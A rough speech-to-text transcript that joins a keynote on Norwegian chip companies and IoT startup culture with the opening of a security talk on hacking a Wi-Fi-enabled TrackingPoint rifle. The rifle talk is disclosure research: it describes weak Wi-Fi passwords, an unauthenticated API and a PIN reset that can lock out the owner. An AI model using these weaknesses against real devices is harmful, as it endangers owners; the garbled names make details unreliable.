Japan and it was at mal in California And or English was better than or Japanese So the obvious choice was to go to California and to meet with with at mal We we came into the room. We had a meeting with the CEO and he said that You guys have ten minutes to convince me that this is that hundred million a million dollar business And I looked at vega and he looked at me and we had like a deck of 45 slides, right? with bits and bytes and registers and and Interrupts and flags and you name it on the last slide. We had hundred million So we decided at the moment to turn the turn the slide deck upside down because we could do that at the time Because there was no PowerPoint on computers. We had just slides We just started the last one which said hundred million and then we moved our way backwards to the front And he was sitting there for three and a half hour So I used to say that if we didn't if we didn't do that Maneuver to change the deck. We probably never heard about the AVR history today We will they sent us home and said don't call us we will call you and We went home and I remember a couple of months later. This is on August. We were fishing in the river and Actually vega was fishing in the river. I was when I fish in the river. I'm done in five minutes I don't get the salmon. I go and start to barbecue or something I'm not patient enough to fish in the river I can fish in the sea where I get fish all the time, but that's I'm too impatient for this river fishing So I was at I was barbecuing and then George Pellegos called us and said hey guys, can you come over? We want to make a deal with you and This menu is from the fish market where we signed the deal in in the Bay Area and that's where we really started to build the products and and if you look at the One interesting thing here is I mean we all talk about Scaling business plans and or scaling was pretty easy because on the hundred over hundred million it was Norwegian Kroner and on George's mind it was hundred million dollars. So it was a quick 67x scaling of the business plan there and then and we never said anything about it. We just did it so So five years later we actually had sold microprocessors for hundred million dollars five years later. So Five years later. This was the first year where the business was hundred million So and when I left the company in 2012 we sold three million microprocessors a day About a billion microprocessors a year so it was quite an achievement from from a great team. I mean we We established the AVR to be one of the absolute leading architectures in the world and I think We had 1200 people working on it in the end spread around in the different design centers So it was one of the really great success stories. I think that I've been involved in But that's not the only one I mean if you look at Norway Norway has Had a lot of great technology companies and still have a lot of the great technology companies That's played a significant role in internet of things. If You look at ship con for example Sheep gone which is today ti and we have some representatives from them here today as well And I think if you look at what ship con did with the radios They became very very popular ti bought them and they become even more popular I was one of the founders so ship con I never worked there but I was the chairman So I was very closely involved and me and they're garden gate and and the people around ship con We worked a lot together to try to to use the best of What we knew and I'll actually to try to help or each other to actually be successful and also the last Company that gate fed a started and we also have keynotes from some of the people that were waiting here today Energy micro which is in this Fitbit watch and in many other products many other wearables was sold to was sold to Silicon Labs in 2013 and it's still a really really good growth of the sales the microcontrollers They also did a great radio specification Which is now brought to the market and I think it pours a lot of internet of things products Another one which I find very interesting is is Falonks and that is a was I remember when they Participated in an adventure cup in Trondheim. It was a group of people that came and they wanted some advice And they were like two three guys and one of them with One of the guys with this one and a half leaders of coke all the time And he was he didn't say anything and his handshake was like yeah, I can't even describe it, right? And and he was drinking coke, but he was the brain I mean he was to definitely the brain when the questions became very very difficult They always looked at him and he was just he could he could give some small singles if they were right or wrong But nothing more, but he created such a great graphic processor that 40% of the phone smartphones in the market today use it and that does not include that does not include Apple and They are in in 50% of the tablets and they have 75% of the of the desktop TV market so in 2015 Their technology was in 750 million products 750 million products That's quite amazing starting from three graduates from from the University and Was sold of course you can say today too early to arm, but at least it's a Norwegian technology That's really poor is it and then of course we have Nordic semiconductor, which which is Very very popular around especially with the latest Bluetooth low-energy chips does great Penetrates market greatly and then of course ourselves see through We are going to come back to that a little bit later. We make a sleeping sensors And we make radar chips that goes into this and I think that It's it's really really This is from my area right I mean the semiconductor area I mean you represents other areas which are also been successful in in IOT But from the basic technology that the semiconductor technology Norway has a really good standing in IOT One example the latest Galaxy S7 powered by the Falonks graphic processors have probably sensor hubs from at mill based on the technology that we developed Probably gonna maybe get Lenses from polite technology polite is a company in Norway that makes autofocus lenses. I mean there is a lot of new technology developed in Norway that also will come into the into the smartphones and we have to remember the role of the smartphone because I mean Steve Jobs said one thing in his keynote. This is gonna change everything when he launched the iPhone in June in 2007 he said this is gonna change everything when he launched the iPhone in June in 2007 he said this is gonna change everything and he was right. I mean this changed everything and This is why IOT is Something new because the smartphone changed it it changed it so we can be connected all the time And we can we can have everything with us where we are and that's also why it changes our life And that's what's good about it and that's what's bad about it because we can't get away from it I mean it's so hard to leave this phone. You see I'm holding it here all the time, right? Even I'm here doing a keynote It's really hard to let go on the phone When the new CEO took over in 2006 the stock share price was around five six dollars And they just got acquired by microchip for eight after ten years. I mean You can't do much worse than that in the stock market in terms of an investment and the reason for that is that it's so difficult To move up in the food chain and actually to add enough value Your products becomes commodity and it's almost equal from from everyone so I think that if you look at the the new game is a little different because You have to think very different. I mean I believe you have to think much bigger I think you have to be smarter I think you really have to be smarter and I think you have to act much much faster I mean things are changing rapidly and you have to be there and you have to actually make sure that you get the Absolute best people there is not there is not enough to get the second best you need the best people because the competition is so hard and I think if you look at interesting things like like Uber and Airbnb and Also Amazon, I mean Amazon was a marketplace that didn't exist many years ago But I mean it's been there for a round for a while now, but I mean people was so said I'm never gonna buy from the internet I'm never gonna buy from internet. It's so secure. My credit card is going to be stolen. Everything's gonna be crazy I have bought on internet since they started. I have never lost any money from any credit cards And if I call a store and and ask them if they can get something for me They say I call us back on Monday because the guy that's gonna order that is not here today And I said, okay, I'll do that and then I go online and I buy the stuff and it's there on Monday already on my doorstep So I mean things changes and if people don't follow this pace, they're gonna be out of business take Airbnb I mean, it's a great story. I mean Joe and Brian Couldn't afford to pay the rent So they both three air mattresses and they decided to rent out those three mattresses and serve breakfast So Airbnb three airbed mattresses and breakfast. That's where it started. They couldn't pay the rent for themselves They made a little website to communicate this to the world and you know what it is today I mean, it was a ten billion dollar value company in 2014 and they don't even know a hotel They did not even own a building. They don't even own a hotel single hotel But they're the biggest provider in the world of this kind of services So I mean that comes and and why is that happening? I mean Sometimes we debate if timing is important if the team is important if the financial power we have is important Or if it is the idea or the business plan I mean when I look into this I started to study this a little bit I mean I look into this in there in the big investors in the US They conclude that the timing is the most important and Airbnb came there because There the recession in the US was so strong and people didn't have money So when this service came out there, it was really oh, yeah, I can make some extra money and I need the extra money So I go out and rent a room and I put it on Airbnb and then the ball starts to roll So the timing is critical 42% of the successful companies Or 42% of the companies that really make it They concluded that the timing was the most important parameters followed by the team and execution and And you better we all know I mean you better saw we have a taxi system in Norway and we have a lot of taxi drivers That's trying to fight you better They know never gonna make it. I mean they they have to adjust to the new game if they want to be successful if you look into my field then other thing what's happening is that company disappears and They disappear because they cannot move up in the in the value chain and they can't get the value for the product So they got commoditized and their profit goes down and NXP bought free scale Intel bought Altera and also microchip as I mentioned bought bought at mal and Western Digital bought Sandisk and I think that's an interesting one Western Digital Was the one of the biggest absolutely biggest in hard drives and Sandisk made memory cards for photo cameras and and small players and what happened The technology developed so quickly that solid state drives became affordable and Western Digital was on this mechanical rotating discs while Sandisk actually made all those Solid-state small memory cards. So their technology became the game changer in the disc space So they had to acquire them for a lot of money to actually Continue to be a market leader. So I think it's so and I think it's a but I think it's the right thing I mean, I think there's nothing wrong in merger than acquisitions But I think also that people need to remember when they build a company is where in the food chain am I? To be a semiconductor company and think you can beat Apple will never work Because you will your product will be commoditized if you think like Airbnb and do what they did you can be big So I mean the business model the way you think the way you start is an important part of it And if you look at it a couple of years from now, they say that about 40% of the companies enterprise companies will not longer exist. So make sure you are not one of them So what companies do succeed and I think there is one company that I'm I'm very interested in that is nest and all here have heard about nest or anyone know what they are doing they They started it was Tony Fidel and Matt Rogers and They left left the Apple I'm always saying at Melba they left Apple and They Tony by the way has 300 patents for Apple He was the inventor of the iPod and has a huge traction in consumer products, and he was building a summer house And he couldn't find a thermostat that was good I mean he looked at all these Honeywell things and all these crappy thermostats on the wall It didn't look nice and you in best case you could program it with a timer to say hey Sunday from four o'clock Not home anymore. So turn down the heat and but Monday I'm back So you had to program all these things that's the best he could find So he decided to do a thermostat that looked good and that worked seamless So he developed a nest thermostat and the thermostat is quite amazing actually You put it on the wall you connect it and you just start to use it if it's too cold Well, then you turn it up if it's too hot you just turn it down if it's Friday and you go away you turn it down and On Monday when you come back you turn it on and after a while it starts to learn your habits It starts to learn your pattern. So it's a it's a machine learning algorithm. That's actually that's exactly what it's Thought to be just by you using it in the way you use it normally So after a while you don't have to leave it you are about to leave on Friday. Oh shit. It's already down good I like you guy and on Monday when you come back. Hey, it's already the warm here good I like that so it's so it's solve the problem because it's solve the problem that we all know about thermostats I have all kind of things I can do with my thermostats in terms of programming But do I ever sit down and program my thermostat? No, I don't but this guy Programs itself and that solves my problem It's quite interesting to and fascinating to listen to Tony when he describes how this thermostat got successful and one of the things to say that we have to make it easy to install and And one of the things nested was a developer screw that was working on concrete and wood and leka and all types of material So you had one screw that worked because they what didn't want to supply it with three four five different screw types to make sure The customer could mounted on any wall. So there are small details like that that makes the consumer products successful and if it if it's remember back nest had a thermostat and then they had a Smoke detector the nest protect and they sold the company four years later. They started in 2010 They sold it to Google in 2014 for three point two billion dollars Three point two billion dollars for a thermostat that we all in this room could make So how can that happen I Think first of all we have to realize that what Google bought was not a thermostat They bought the mindset they bought a culture that could create new things that could think in a new way And that could actually execute on it. I mean when I first visited Nest there were 70 people and then there were hundred and seventy and then they were 400 and next time there were 700 and last Time when I was there a couple of months ago there or weeks ago. They were 1200 people So I mean they scale fast they execute well and they have a mindset. That's really disruptive I Happened to know Tony a little bit because he's one of the angel investors in my company now And I asked him what if I was gonna hold a keynote today And I said give one advice that I could bring up on the screen and tell the people I'm talking to and he gave me a Few and I picked the one I think is the best and I think he said gadgets comes and go solve a problem When I look at When I look at startup companies today, and I look up quite a few of them Many of them are about to do a me-too product They don't even Google what's out there today And I think they don't really solve a problem and unless you really solve a problem. It's really hard to succeed if I put up the year 2029 Anyone can think about what I want to say with that Anyone read some articles lately about 2029 2029 is the year they say that the computers are smarter than the humans When I was studying artificial intelligence was a neural networks was an interesting area But it's never gonna happen. Some people said that the digital film is never gonna be as good as analog film either And they were wrong Maybe maybe when we wake up in the morning in 2029 we have to ask yourself who's really in control Who's actually operating the Operating the VD 40 box on the side there. Is it the robot itself? Using it on the other guy or is it the other guy using it on the robot or who's in control? It's a little scary We have seen lately Machine learning algorithms where we're computers without having any idea about the game starts to play the game and after 10 minutes It starts to be better after an hour. It starts to be better after a couple of hours. It's awesome. It beats any human So I mean, it's it's an area where we get the same ethical questions as we have had with Gene manipulation and things like that and it's gonna come here as well But that's Something we just have to control I think So let's look a little bit into business cultures. How do we need to think how do startups need to think and I think this is also valid for mature companies. I mean one of the big problems with mature companies is that they start to see They say stop to think like a startup and I think just think like a startup is really important for new innovation That's why ship call was sold for 1.2 billion knock and that was energy why energy micro was sold for 1 billion knock to Silicon labs because these companies represents a New way of thinking and they had a strategy. They were able to execute. I mean they could they could they really moved forward quickly and I'm gonna go through and this is of course what I believe and I think You all have probably different views on this, but I mean in my view It's it's really important how the culture in the company is structured and how we as humans thinks So how many I've heard about the marshmallow challenge Okay, quite a few. I mean it's an interesting one and I I'm one of the founders of the maker fair in Trondheim and Trondheim makers organization and we used that spaghetti and marshmallow building competition Quite a lot and you get 20 sticks of spaghetti You get one meter of tape and you get one meter of string and you get one marshmallow and the marshmallow is going to be on the top and the goal is and you're there's a team of four you get 18 minutes and The the key thing is to build the highest Tower with the marshmallow on the top There's been a lot of studies on this. I mean one of the studies I looked at had lawyers, they had kindergarten graduates Architects and engineering graduates and they had CEOs and CEOs with admins Who do you think was building the highest tower in 18 minutes? Huh kindergarten, yeah, thank God it's not kindergarten, but I Think if kindergarten it was the architects, but it's a good. It's a good Proposal because kindergarten was number two right kindergarten actually build higher towers than the lawyers than the business school students than the CEOs probably including myself and And and it's interesting right? I mean the kids in garden graduates build higher towers than Adults When we added see the admins to the CEO the CEOs Perform better or the admins did the work. I don't know It can be it or it doesn't tell we need to look at the videos to actually find out but the interesting thing here is that kindergarten performs above average and I'm going to come back in a little minute to why it's so In a culture You always discuss new ideas and you have a lot of different people and it's important to have a lot of different people People are so afraid to let other people from other cultures or from other parts of the world Into their little protected era, but that is so important You really need to have a lot of different a huge variety of people and we that's been working in the States from Many years we know that we have people from all over the world in the same place And we don't even think about it It's just the way it works and the dynamics is so important and you have to amplify the differences to really get the good ideas out And that's very very important The next thing which Silicon Valley is known for and is to fail fast In Norway we tend to build the perfect product too early We try to industrialize it. We try to build a nice in capturing because we cannot show people an Arduino board and And connected with cables to a sensor connected to a display. It looks terrible But that doesn't matter smart people know that we can move that into something smaller Whenever we want when it works and it serves the purpose we can move it into something smaller That's not that's not a difficult thing The difficult thing is to solve the problem and if we can solve the problem is something big and clumsy Let's do it because we can do it tomorrow instead of waiting for a perfect printed circuit boards to come back four weeks later And the iterations goes faster. We can change it. We can change it. We can change the cable We don't have to do any rerouting so I mean fail fast and make sure that you have discovered driven learning And that's what happened with the skin the garden graduates because they didn't make a plan The first of the thing they had to to decide not to eat a marshmallow because that's the the first thing they would do So I think that's where they were struggling the most to keep it in one piece But then they started to fail they started to be a little and I said aha it fell down shit Let's build it up again and they learned and they learned and they learned and in the 18 minutes They had failed several times and get this aha Surprises where they where they actually said okay, we need to do it differently while the business students made a plan They just they were like, okay, let's get an overview of the situation and let's Let's make a plan and you you do that and you do that and you put the marshmallow on the top in the end And it was when it was five minutes left. It started to build and it fell down Well, the kindergarten was on their fifth building when that when the time ended So fail fast discover driven learning is really really important and In novella today the company I'm running I I have a CEO who is extremely structured and When I explain the difference between me and him I say my role is to do the right things and his role is to do it right and one of the biggest debates we have is How perfect we need to build it at this stage? I mean in the In the in the industry we talk about the minimum viable product What is the minimum product? We have to show to smart people dumb people We don't doesn't matter what you show to they won't understand it anyway But if you meet smart people you can show them the minimum viable product and they will understand how this can be implemented into something bigger The next thing is of course to Reach the creative resolution and I think that is really important you have to drive and make sure that you Differentiate enough and you use the creativity in the company and Nokia once said something very interesting They said that to explore new fields means taking risk and They said to not explore new fields means taking even greater risk So I think it's important to move the barrier and make sure that you differentiate enough and create disruptive technology If you look at my career On the left side we have a tiny AVR chip great microcontroller on the right side. We have a chip about the same size It's the X4 radar From the Veldar on the left side. It's a commodity product. Microchip sells the same tia There are 45 providers of the same silicon almost on the right side. There's only one and that's us and That is the and what happens then is that we can walk in any door to Google to Samsung to Apple to Tesla to everyone on the left side we have to Wait and see what happens. It's really difficult So on the right side we can get between five and fifteen dollars for the silicon on the left side We get twenty five thirty cents It's a big difference. Make sure you do the right things Another important thing I mean who succeed and I'm as I told you I'm very enthusiastic about aviation and I think that the history around the first aircraft that was could transport a human being is really fascinating and The Samuel people and Langley have you heard about him anyone? He was the guy that was appointed by the US government to Develop the first airplane that could transport people and people and Langley got all the resources in needed He'd get fifty thousand dollars from the Defense Ministry He get twenty thousand dollars from the this was in the end of 1800 he got twenty thousand dollars from the Smithsonian's He got access to all the engineers in the world or at least in the US And he got the access to universities and he could do whatever he wanted And he knew that if he was building this plane is gonna be so famous and be in history books forever So he he used all this money and he started to build this aircraft and Yeah, the camera guys was with him all the time because they wouldn't wouldn't miss the moment where he was flying because he was He wanted to really get famous and I think What happens was that in 1903? December 7th, he crashed for the second time first time was a little earlier and he had a catapult So he ejected the airplane up in the air and it was supposed to fly and then he crashed on the second time He gave up and decided that this is not possible In the meantime, there were two other guys which we all know about which are the Wright brothers They were a little different They didn't have any money. They didn't have any network. They didn't have any support from the government But they knew that if they could make an airplane, they would change the world So they and then they started to walk around and they got people that they changed the world. That sounds interesting I'll join you and then I'll join you and I'll join you and they started to form a lot of great group of people That wanted the same thing as them They didn't need the money, but they had the passion and they had a goal to why they did it and People go with you because why you do things not necessarily what you do so I think the Wright brothers were flying in 1903 December 17th and and are known as the Founders or the developers of the aircraft people and Langley was the difference between them was that people Langley wanted to be famous and Not many people want to support and spend their time for one person to be famous But they want if you have a common mission to change the world. You actually want to join them and I think the Interesting thing here is also that the People at Langley was after that he was he got sick. He died in 1906. I believe as a poor and unhappy man So make sure you do things for a reason Make sure you don't just do things but you need to have a reason if you have a reason you miss you Don't need all the money. I mean you get people to join you and you get people to with passion to actually do it and passion is one of the strongest drives Forces to actually succeed personally. I mean, I think passion is the most important benefit of a person I mean think about it yourself the things you're really interested in you read all the literature if it's day or night You don't care If it's weekends, you don't care you just want to understand this and then when you use all that Competence into the work you do you perform so much better than the person that is there eight to four and then you So much better than the person that is there eight to four and that's exactly what it's been told So passion is extremely important. How many of you guys have implants not silicon implants But the implants silicon chip implants in your body anyone having a access chip in your hand or No electronics in the body because that's gonna come and A friend of mine he is I have a pretty Sophisticated surveillance system in my house and the guy that's installed that he has a chip in his hand So he he don't walk around with all his cards. He just have a chip under his skin So he just holds that into the into the card reader every time he wants to get in and he has programmed that to all the places Where he is allowed to get access So I think one of the challenges you guys I mean you are passionate people and you are embedded designers I mean we have to get electronics in the body, right? We really I mean wearables is that's boring that's for that's for nuts for us. I mean we are embedded designers. We want in body electronics So I mean look at this guy. I mean he has a complete computer under his skin This is hardcore passion for embedded and wearables, right? So there's a way to go. I mean none of you has even even a small little Capsule and this is the next step this has all kinds of sensors and he has an app he can read everything from his body with this I don't know how you replace battery, but maybe his wife if it's a surgeon or something So I think let's go quickly back to building a company because The other thing we need to make sure we do when we build the company is to look at what are the real big trends in the world? I mean there there's so many things we can do and No matter what we do we have to do all we have to go through almost the same procedures So let's make sure we choose the right things and I think that Today there are a couple of megatrends health care is one of them and or health health related products is everything from this Fitbit watch That's probably soon gonna say I got ten thousand or twenty thousand steps here up on the screen That is the the the consumer products and then you have more medical oriented products and you have senior care products and you have products that because remember we get older and older and older and We we need a lot of more support in the house and home to actually to sustain the living quality that we do today So a lot of the health things is going to be moved to the home. There's a huge area there home automation It's been talked about for Years and years and years but now with the new tread networks and new radio protocols the new low power controllers and the New things that makes these batteries last for ten years and not for three years like my batteries does Then it starts to be a market that's going to expand quickly The other thing which when I came into novella we we had This was in 2013 after we sold energy micro and then the company did everything We had a radar in landmine detectors. We had radars in Grand penetrating radars for finding pipes. We could measure ice thickness snow depths We can look into the body. We could you name it. I mean we were in all kinds of things The first thing I had to do was to focus the company and We focused the company in three directions and sleep monitoring is one of them which I showed you earlier And the other thing is is people detection and also medical monitoring And medical monitoring monitoring is because all radar can see into the body if I put the right radar chip in here I can actually see my heart movements If I put this on the nightstand it can actually read all my breathing patterns from the nightstand And that can be used into many many things and I think that the same technology we use in smart buildings because Just think about the hotel room when you go to the hotel room You have to put a card in the door to tell that you are there and if you're not there the air conditioning is going all the time If the card is still there so I think that and all of us get two cards so the air conditioning is probably going all the time While a radar can detect you while you are sleeping under the under the comforter and actually detect that there is someone breathing in the room It's so sensitive and that is can be used for evacuation control if you are in a room that is not in the room And that is can be used for evacuation control if you if people come into a building and say where are the people you can detect where there are people So there is a lot of different applications that can use this kind of sensing technology We installed the other day we installed a test system at the police station in Norway where in Trondheim where where the cells where they put the drunk people They have four cells for that and the new regulative says that they are going to count the breathing frequency every 20th minute And think about the resources if you are going to stand there and count the breathing frequency of people every 20th minute I mean it's impossible but we installed the radar and now we can see the breathing pattern from all the people that are in there and report that back to the control room So that's just a little bit I mean we selected a few verticals that means taking a risk I mean to go wider feel safer but it's actually much more risky To go narrow is a risk but at least you can know what you are doing Okay this is an area where many of you know a lot about I mean there is a big data trend and there is a lot of different layers in the internet of things And in this session today there is going to be a lot about security and security is a really really important thing And I think that with all the sensors on the body in the body in our house the security part is really really really important And who is going to get access to the data and I think that the protection layers here is really need to be sophisticated but there is always a risk that it's going to be hacked That's one thing that's going to prevent people from actually using internet of things devices that they are afraid is going to be hacked The other thing is that if you look at this you have the cloud services on the top and you have the fog which is more like the in-house things before it goes on to the cloud And then you have the in-between the sensors Every company today wants to have a sustainable business they wants to have a subscription so that when I for example control my summer house I have a subscription with a company so I can control my house So it's an internet subscription which I need to have and if that company goes under all my hardware and everything I've installed is worthless So I think that is the biggest challenge for small companies to come up is that ok do we think we can offer better security than Amazon Or do we think we can convince the customer that we have a better security than Amazon That is an important thing to ask yourself And I think that in terms of in my case can we convince or can people convince me that they are going to stay in business If I'm going to buy a sleeping sensor from Novella or a watch or whatever that goes through the cloud what happens if they go under Where is my data what happens to my data I mean I use Dropbox a lot What happens if Dropbox goes under what happens to their data I mean all the security questions all the sustainability of all the small companies is going to be a challenge So when you make a business plan you have to think about them because that's the major questions in the industry today that you need to convince the customers about But there is no doubt that the opportunities are huge I mean we know that this is going to grow to a huge business The number of devices today is 15 billion it's going to grow to 75 billion connected devices There are opportunities there great opportunities for everyone and I think we can just go out and pick one but we have to pick the right ones And I think we have to fight and work hard to make it happen it's not easy and we need to get to get absolutely best people When I looked at CVs for smart for machine learnings for example we found some people in Cambridge in the UK They had actually a lot of grants from Google, from Facebook, from Apple, I mean million dollar grants for their great work And this is the kind of people we need to find because remember when I was educated I was told that it could never be smart enough I mean the brain is smarter than anything else no matter what you do and that's about to change so we need the people that change that actually thinks a little different Okay I have one more thing I want to say and that's going back to my childhood I think that I'm going to use a quote from Einstein I have no special talent I'm only passionately curious and I think that's the most important characteristics of me and why I want to do all this Thanks Questions? They can be in Norwegian if you want to Okay no questions that's good I'm colorblinds if you pick red or green doesn't really matter to me
IOT is the new word that every developer and company talk about. But do we need all this? When is it too much? Alf-Egil has been caught by the IOT monster years ago and is now trying to escape. He has been involved in IOT technology his entire career and will also look at the good sides of IOT and how Norwegian companies have enabled this new trend. As the co-founder of Atmel Norway and Chipcon, and now a board member of Silicon Labs and the CEO Novelda he will look at the challenges for both large and small companies to establish themselves into the IOT business. Does IOT require a new young disruptive mindset, or will the old-school founders make it?
10.5446/50524 (DOI)
Okay. Hi. Morning. Welcome. My name is Runa Sandvik and I'm going to talk about 10 things I learned while hacking a Linux-powered rifle. So I'm originally from Oslo, Norway, but I figured I'd give the presentation in English since it's just a lot easier with a lot of English terms and talking about rifle components as well as a bit easier in English. But feel free to ask questions in Norwegian if you want to. So this is a presentation that I gave at Blackhead and Def Con in Las Vegas last year. And I figured I would try and now sort of give the same talk, but then also summarize, sort of put an emphasis on 10 things that I learned or that I took away from this project. The number one question that I usually get when I say that I hacked a rifle is why. And the sort of default answer for me is because I can. It's one of those things where living in Norway and reading a lot about Blackhead and Def Con, which are sort of these two massive hacker conferences in Vegas and just seeing all the amazing things that the researchers do at this conference or at these conferences, I just always had a bit of a bucket list item that I wanted to pull off this fantastic project at this conference. And so hacking a rifle, I think, certainly put it on the list. So lesson one, sort of number one thing that I learned is I would say more something that I figured out before I even started working on the project, which is that people rarely pay attention until you make a statement. If I were to hack a toaster, for example, or a fridge magnet or a Barbie doll, I mean, it's fun, it's cool, but it doesn't get you the same level of attention as hacking a car or hacking a rifle or hacking an airplane or a satellite. You didn't get the idea. People aren't going to pay attention until you sort of make a statement like that. And they're not going to see the value in securing the product either until you can really, really highlight why this matters. So that was sort of the number one thing. In part, I wanted to hack a rifle because I can, but I also wanted that sort of that statement piece to really get people to pay attention. So the rifle that we hacked, and when I say we, this was a project that I did with my husband. So we decided to, or rather, he took me to a gun show where tracking point had a stand showing off these rifles that have this sort of computer inside the scope, and it has a wireless network, and it has mobile apps and all sorts of fancy things. And I said, well, we should totally buy one, hack it, and present in Vegas. And he said, okay. So that's what we ended up doing. So the rifle that we bought is a tracking point TP750. So that just means that it's a standard stock Remington 700 bolt action rifle. So it means it takes one bullet at a time. You put one bullet into the chamber. You load it, you fire, you have to do it all over again. Standard standard stock rifle. But tracking point then put a custom scope on it. And I have some photos later to really illustrate this, but inside the scope is a bunch of PCBs that sort of make up the little computer inside of it, and there's a link, a sort of mechanical link between the scope and the trigger as well. The hardware platform is called Cascade on the TP750. So tracking point has a couple of other firearms as well with a different hardware platform, but we have been able to confirm that the issues we found on this rifle are also present in the other firearms that are running the sort of newer platform. So it runs a modified angstrom Linux, which is sort of the same, the same that you'd find on a Beaglebone Black. So it's pretty much like a really small Beaglebone Black inside a rifle. You also have 16 megabyte flash stores for kernels and then 4GIG for the file system. So I also wanted to just quickly explain exactly what makes the tracking point rifle interesting. And that is what tracking point calls the tag, track and exact system. So up on the sort of first picture to the left where it says tag, the whole idea is that you're behind the rifle and you're looking inside the scope and you identify your targets. You can then put the crosshairs straight on your target and then tap the red button that's by the trigger on the rifle. At that point you tag your target so that the software that's inside the rifle will actually help track your target as it moves back and forth. You can pull the trigger, but it's actually not going to release and fire until you've managed to line up the rifle in such a way that you will hit your target every single time. So it's like sniping for dummies, pretty much. I mean, coming from Norway, I had zero experience with guns and I did not miss a single shot. So that sort of gives you an idea of what this sort of firearm can do. Some quick things to keep in mind. Our attacks require the Wi-Fi to be on. So when you're using the rifle, you probably do want to use the scope so you can power the scope on, but you don't have to use the Wi-Fi unless you really want to. So we do require the Wi-Fi to be on to actually do any of the stuff that we're doing. We cannot fire the rifle remotely. We can do a lot of interesting things, but we cannot fire remotely. That's still a physical mechanism. And the TP750 is a firearm even without the scope. So this means that even if I were to permanently brick the scope on your rifle, it will still function as a firearm. It's big and it's heavy and you can't really see what you're doing, but you can still pull the trigger and fire. So when we started this project, I mean, I had some experience with, I guess, I'll just call it software hacking. My husband was sort of the more hardware person and I did software stuff. But we still had a lot to learn when we took on this project. And sort of with any sort of hacking project, whether it's hardware or something else, you sort of have to sit down and think about ways to get in. You have to actually think like an attacker. You can't just take this thing out of the box and say, how would a normal person use this? You have to say, well, if I was really evil, what could I do? How could I get in? So the rest of the presentation is sort of divided into rounds. So I got round one through three, where we sort of have round one and the stuff that we sort of tried initially, the things that we looked at, the things that we sort of tried and failed with, and sort of I'll summarize round one and then we'll step on to round two. So round one is sort of the unboxing. You get the rifle, you pop the box open and you try to figure out what is it that you just bought? What does it look like? What can you do? So this is an illustration of the scope itself. As you'd expect on any rifle, it has a microphone and USB ports. And the power button, which is just the right of the USB ports on the bottom right, once you've powered on the scope, if you push the power button once, it will turn on the Wi-Fi. So it also has some sensors for just temperature and a couple of other bits and pieces. But fairly, I say standard. It wasn't sort of anything super exciting. We thought that the USB ports would actually lead to something good, but it turns out that they are disabled on boot. So at this point, we're like, okay, so we have this rifle. It looks like this. It powers on. It has batteries and stuff. It has Wi-Fi. So what do you do? Well, you port scan. Try and figure out what kind of services are running on this thing. This is port 80, so there's a web server. And port 554, so there's a sort of video streaming service that's running as well. And that was it. We were sort of hoping for something more exciting, like port 22 for SSH or Talmud or something that would just make this really easy. But no. So okay, we got the rifle. We can't really just sort of SSH to it and talk to it. So what do we do now? Well TrackingPoint developed two mobile apps for the purpose of sort of interacting with this rifle. One app is called ShotView. All this app does is once you're connected to the Wi-Fi of the rifle, you can open this app and it allows you to just see with that video streaming service. It will just allow you to see exactly what the shooter is seeing inside the scope. So you can't do anything. There are no buttons. There are no settings. There's nothing that you can change or touch or interact with. You can just watch the stream, which TrackingPoint would say that this is like a really good thing for like training purposes. The other app, the TrackingPoint app is a bit more exciting because it has, it gives you some settings that you can change. You can change the temperature, the wind, the type of ammo used on the rifle. Every single time you tag a target or take a shot, the rifle will record and store a video of that on the scope that you can then download onto your phone. So if you just took this amazing shot and you want to put it on Facebook, the rifle makes that really easy. And there's like a passcode as well. So when you initially start the rifle, it started in what's called traditional mode. So at this point, if you pull the trigger, it will fire and you may miss your targets. Advanced mode is where you get the tag track and exact system where you have to tag your target. You can hold the trigger, but it's not going to fire until the whole system has sort of calculated that if I fire right now, I'm going to hit the target. So you can set a passcode for that as well. So digging around some more, WPA2 is used on the Wi-Fi. We found that it's just plain text communications between the apps and the scope. So between your mobile phone or tablet or computer and the rifle itself. The rifle uses HTTP, so just plain text really, or clear text, to pull updates from tracking points of websites. So the way that it does that is that you connect your phone to the rifle and you pull the version of the software and the serial number from the rifle onto your phone, then you take your phone and put it on the internet again and you talk directly to tracking points website and say, hey, here's my serial number, here's the version I'm currently running, do you have an update? Tracking points will go yes, here's a package for you. Send it back to your phone, you plug your phone back onto the rifle's Wi-Fi and it will push the package up. So when we saw that, we were like, holy shit, this is really exciting. There are packages in the clear, but the updates are actually GPG encrypted and signed. It can only be decrypted with a passphrase that only the scope knows. So it wasn't a passphrase that we could easily guess. So at this point, we don't have a whole lot of interesting stuff. There are bits and pieces that are sort of interesting, but not something that actually would give us anything really interesting to talk about. So we decompiled the mobile apps to see if there were some additional features that we just hadn't tried. See if you try and pull out any communication that the apps can do with the rifle, you end up with sort of like a public API. There's like something for package upload. You can pull the serial number, you can set a passcode, get the version number, set the type of ammo. There are some interesting bits and pieces, but nothing really juicy. And we also found that while the mobile app or this API lets you change when in temperature and ammo, it's only within a set range. So if you try and change the temperature, it's going to give you like, I think like five, I think it's five values that you can choose from. So you can, for example, set the temperature to be minus 5,000. So it does do some input validation. So we're like, okay, well, we don't have anything like super exciting. We have like a couple of buttons that we can push, but they don't really do anything. We have these apps, but our input is always validated. So what do we do next? So we just decided to just start pushing buttons to see like maybe there's like a magic button combo that would like open admin mode or pop open SSH or something. But no, sadly not, which sort of led us to sort of summarize round one with the SSID of the Wi-Fi contains the serial number of the rifle and you cannot change it. So identifying a tracking point Wi-Fi is pretty simple because it's going to be like TP underscore and a bunch of numbers, which is the rifle's serial number. The password is easy to guess and you cannot change it either. And any RTSP client can stream the scope views. You can stream it on your computer if you want to. Like I mentioned, the API validates input and I say it's unauthenticated because anyone who can get onto your rifle's wireless network can use the mobile app. There's no sort of check to see is this Runa's phone talking to me right now. So anyone who can get on the Wi-Fi can do stuff, can use the apps. I mentioned that there's a, you can set a four-digit pin to lock advance mode, but four digits is pretty easy to brute force and there's also a public API call that just resets the lock completely so you could easily connect to someone's rifle, reset the pin if it's there and then set your own pin so that the owner can't use it. And the updates are GPG encrypted and signed. So at this point, I think, so we spent about a year off and on working on this project and I think at this point we had been trying to sort of work on it for probably about four or five months and we were getting pretty close to the time when you have to submit a talk to Blackin and Def Con and we were like, we really, really need to find something better than this, which sort of to summarize lesson three, you need to be willing to potentially brick the device. There sort of comes a time in any sort of hardware project where you need to just suck it up and just open the thing up and see if that gives you more access, which potentially bricks it later on, but if you're lucky, you can sort of still salvage some bits. So for round two, we decided to take a closer look at the inside of the scope. So in this case, you see the scope on top with a bunch of PCBs and then you see the red button by the trigger. That's the red button that you push to tag your target. And at that point, the trigger is locked. So you can pull the trigger all you want, but it's not going to release in fire until the 